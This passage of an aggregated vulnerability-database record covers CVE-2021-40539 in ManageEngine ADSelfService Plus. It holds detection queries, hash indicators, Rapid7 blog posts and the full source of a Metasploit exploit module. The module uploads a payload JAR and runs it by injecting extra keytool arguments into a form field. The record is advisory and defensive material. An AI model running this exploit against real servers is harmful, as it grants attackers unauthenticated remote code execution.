HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService 
Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-11-09T00:24:55", "type": "mmpc", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T13:18:51", "description": "This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "1337DAY-ID-37080", "href": "https://0day.today/exploit/description/37080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService 
Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin 
(working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-15T19:18:22", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-08-15T15:41:33", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "rapid7blog": [{"lastseen": "2021-11-10T09:08:01", "description": "\n\nOver the weekend of November 6, 2021, Rapid7\u2019s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:\n\n * CVE-2021-40539, a REST API authentication bypass in Zoho\u2019s ManageEngine ADSelfService Plus product that [Rapid7 has previously analyzed](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). CISA [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is [also warning](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.\n * CVE-2021-42237, a [deserialization vulnerability](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>) in the Sitecore Experience Platform that allows for unauthenticated remote code execution [in earlier versions](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776>). The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. 
With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.\n\nAttackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7\u2019s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.\n\n## Rapid7 customers\n\nThe following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:\n\n * Webshell - IIS Spawns CMD to Spawn PowerShell\n * Attacker Technique - PowerShell Download Cradle\n\nInsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a [remote vulnerability check](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-adselfservice-plus-cve-2021-40539/>). Rapid7 vulnerability researchers have a full technical analysis of this vulnerability [available here](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. 
A technical analysis of this vulnerability is [available here](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>).", "cvss3": {}, "published": "2021-11-09T16:59:41", "type": "rapid7blog", "title": "Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539", "CVE-2021-42237"], "modified": "2021-11-09T16:59:41", "id": "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "href": "https://blog.rapid7.com/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\n\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). 
A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. 
It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. 
Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T15:27:57", "description": "\n\nGreetings, fellow security professionals. As we enter into the new year, we wanted to provide a recap of product releases and features on the vulnerability management (VM) front for Q4 2021.\n\nLet's start by talking about the elephant in the room. 
The end of last year was dominated by [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), the once-in-a-generation security vulnerability that impacted nearly every corner of the security industry and completely ruined every holiday party we were invited to. But as you will see below, in addition to providing you with strong Log4Shell coverage, our VM team has been hard at work on multitudes of other features and capabilities as well.\n\nChief among these are improvements to credential management aspects of scanning, in the form of Scan Assistant, and better Credential Status Reporting. Container scanning is also seeing improved integration of results, as well as enhanced checks leveraging Snyk. Last but not least, email distribution of reports will allow you to better communicate findings across the organization. In other words, Q4 was more than Log4Shell over here, and we're excited to tell you about it.\n\n(Note: Starting this edition, you will see up front a label of [InsightVM] vs [InsightVM & Nexpose] to clarify which product a new feature or capability pertains to)\n\n## [InsightVM & Nexpose] Log4j security content\n\nWhen Log4j hit in early December, our VM teams went into high gear offering solutions and boosting ways InsightVM can identify vulnerable software. 
Here's a recap of our current [coverage](<https://docs.rapid7.com/insightvm/apache-log4j>):\n\n * Authenticated, generic JAR-based coverage for Windows, macOS, and Unix-like operating systems\n * [Mitigation checks](<https://www.rapid7.com/db/vulnerabilities/apache-log4j-core-jndilookup-mitigated/>) for macOS and Unix-like operating systems\n * Remote check for vulnerable HTTP(S) applications\n * Package-based checks for supported Linux distributions\n * [Coverage](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-CVE-2021-44228/>) and [mitigation](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-core-vmsa-2021-0028-9-mitigated/>) checks for CVE-2021-44228 and CVE-2021-45046 affecting VMware vCenter Appliances\n * We also added IVM checks to assess CVE-2021-45046 on [VMware Horizon Connection Server](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-connection-server-cve-2021-45046/>) and [Horizon Agent](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-agent-cve-2021-45046/>)\n * Authenticated JAR-based checks for follow-on CVEs (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)\n\n## [InsightVM] Log4j dashboard and Query Builder\n\nWe added a log4j Query Builder query to the Helpful Queries section of Query Builder and a new dashboard template (the Specific Vulnerability Dashboard) designed to allow customers to visualize the impact of a specific vulnerability or vulnerabilities to their environment.\n\n\n\nWe have a TON of additional Log4j resources here for you to check out:\n\n * A [blog ](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>)from our product manager Greg Wiseman that gives some great context on using InsightVM to detect Log4j\n * A [customer resource hub](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) on how various Rapid7 products help you defend against Log4j\n * A [general public resource 
hub](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) on background info about this extraordinary new vulnerability\n\n## [InsightVM & Nexpose] Additional vulnerability checks and content (non-Log4Shell)\n\nBelieve it or not, the world has seen other vulns beyond Log4j. As a team, we added nearly 4,000 vulnerability checks to InsightVM and Nexpose in Q4 and more than a few that warrant mentioning here.\n\n * Zoho's ManageEngine portfolio was affected by critical unauthenticated remote code execution vulnerabilities in [ServiceDesk Plus](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-servicedesk-plus-cve-2021-44077/>) and [Desktop Central](<https://www.rapid7.com/db/vulnerabilities/http-manageengine-dc-cve-2021-44515/>)\n * We also saw [opportunistic exploitation](<https://www.rapid7.com/blog/post/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/>) of [CVE-2021-42237](<https://www.rapid7.com/db/vulnerabilities/sitecore-experience-platform-cve-2021-42237/>), an insecure deserialization vulnerability in the SiteCore Experience Platform\n * The open-source CI/CD solution GoCD was hit by [CVE-2021-43287](<https://www.rapid7.com/db/vulnerabilities/http-gocd-cve-2021-43287/>), allowing unauthenticated attackers to leak configuration information, including build secrets and encryption keys, with a single HTTP request\n\nIf you want to learn more about these and many other threats that materialized during Q4, check out our [Emergent Threat Response](<https://www.rapid7.com/blog/tag/emergent-threat-response/>) blogs (you should check those out regularly, because we are constantly and consistently writing about new threats in near real-time).\n\n## [InsightVM & Nexpose] Introducing Scan Assistant\n\nCredential management for Scan Engine can be a huge burden on vulnerability management teams, especially when you are managing tens of thousands of devices. 
That's why we created Scan Assistant to help ease that burden.\n\nScan Assistant is a lightweight service that can be installed on each scan target. It allows you to scan targets without the need for credentials. When the Scan Engine scans a target with the Scan Assistant attached, it will automatically collect the information it needs to access the target without the need for additional scan credentials. In addition to enhanced security, Scan Assistant improves scan performance for vulnerability and policy scans, has a fully on-premise footprint, works with both InsightVM and Nexpose, and is completely idle until engaged by a scan. Scan Assistant has now GA'ed for Windows environments. We'll have coverage for other OSes to follow in the future.\n\nAnd, as usual, you can learn so much more [here](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n\n\n## [InsightVM & Nexpose] NEW - Scan diagnostic checks for Credential Status Reporting\n\nWhile we're on the subject of credentials during scans, every so often the scan engine can return a partial or total credential failure that might leave you scratching your head. With this new feature, InsightVM and Nexpose offer scan diagnostic checks that allow you to have more granular visibility into credential success (or lack thereof). This will allow you to better troubleshoot authenticated scans that return results you did not expect.\n\nResults are written as vulnerability checks, giving you the ability to use aspects of the platform's functionality that you are already familiar with to assess where things went wrong.\n\n\n\n## [InsightVM] Container Image Scanner integration, additional container software library package checks, improved container scan results integration, and emailed reports\n\nWe are always looking for ways to make your life easier, and these three new improvements to the InsightVM platform are designed to do just that. 
First, we enhanced the Container Image Scanner to record and post results to InsightVM rather than just to the developer's local machine where the container lives. This allows the organization to better monitor the security of containers under development. Take a look for yourself \u2014 it's in the Builds tab of the Container Security section.\n\nWe've also launched a fingerprinter for .Net NuGet and Ruby Gem packages. This allows us to check for vulnerabilities in these software packages leveraging the Snyk integration. This brings our support for Snyk security content to include Java Maven, Node NPM (JavaScript), Python PIP, and now .Net NuGet and Ruby Gem packages.\n\n\n\nFinally, we're making it easier to share findings across your organization by allowing reports to be sent via email. The message includes a password-protected and encrypted PDF, and recipients receive the password in a separate email to ensure the info remains secure.\n\n\n\nQ4 was a trying time for everyone in the security sphere, and we know that our work on that front is far from done. We hope that some or all of these new InsightVM and Nexpose features make Q1 2022 and beyond a little easier, less stressful, and ultimately more secure. 
Stay strong!\n\n_**Additional reading:**_\n\n * _[Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](<https://www.rapid7.com/blog/post/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[Distribute Reports to Email Addresses in InsightVM](<https://www.rapid7.com/blog/post/2021/11/17/distribute-reports-to-email-addresses-in-insightvm/>)_\n * _[InsightVM Scan Diagnostics: Troubleshooting Credential Issues for Authenticated Scanning](<https://www.rapid7.com/blog/post/2021/11/03/insightvm-scan-diagnostics-troubleshooting-credential-issues-for-authenticated-scanning/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T14:20:00", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q4 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42237", "CVE-2021-43287", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T14:20:00", "id": "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "href": "https://blog.rapid7.com/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac 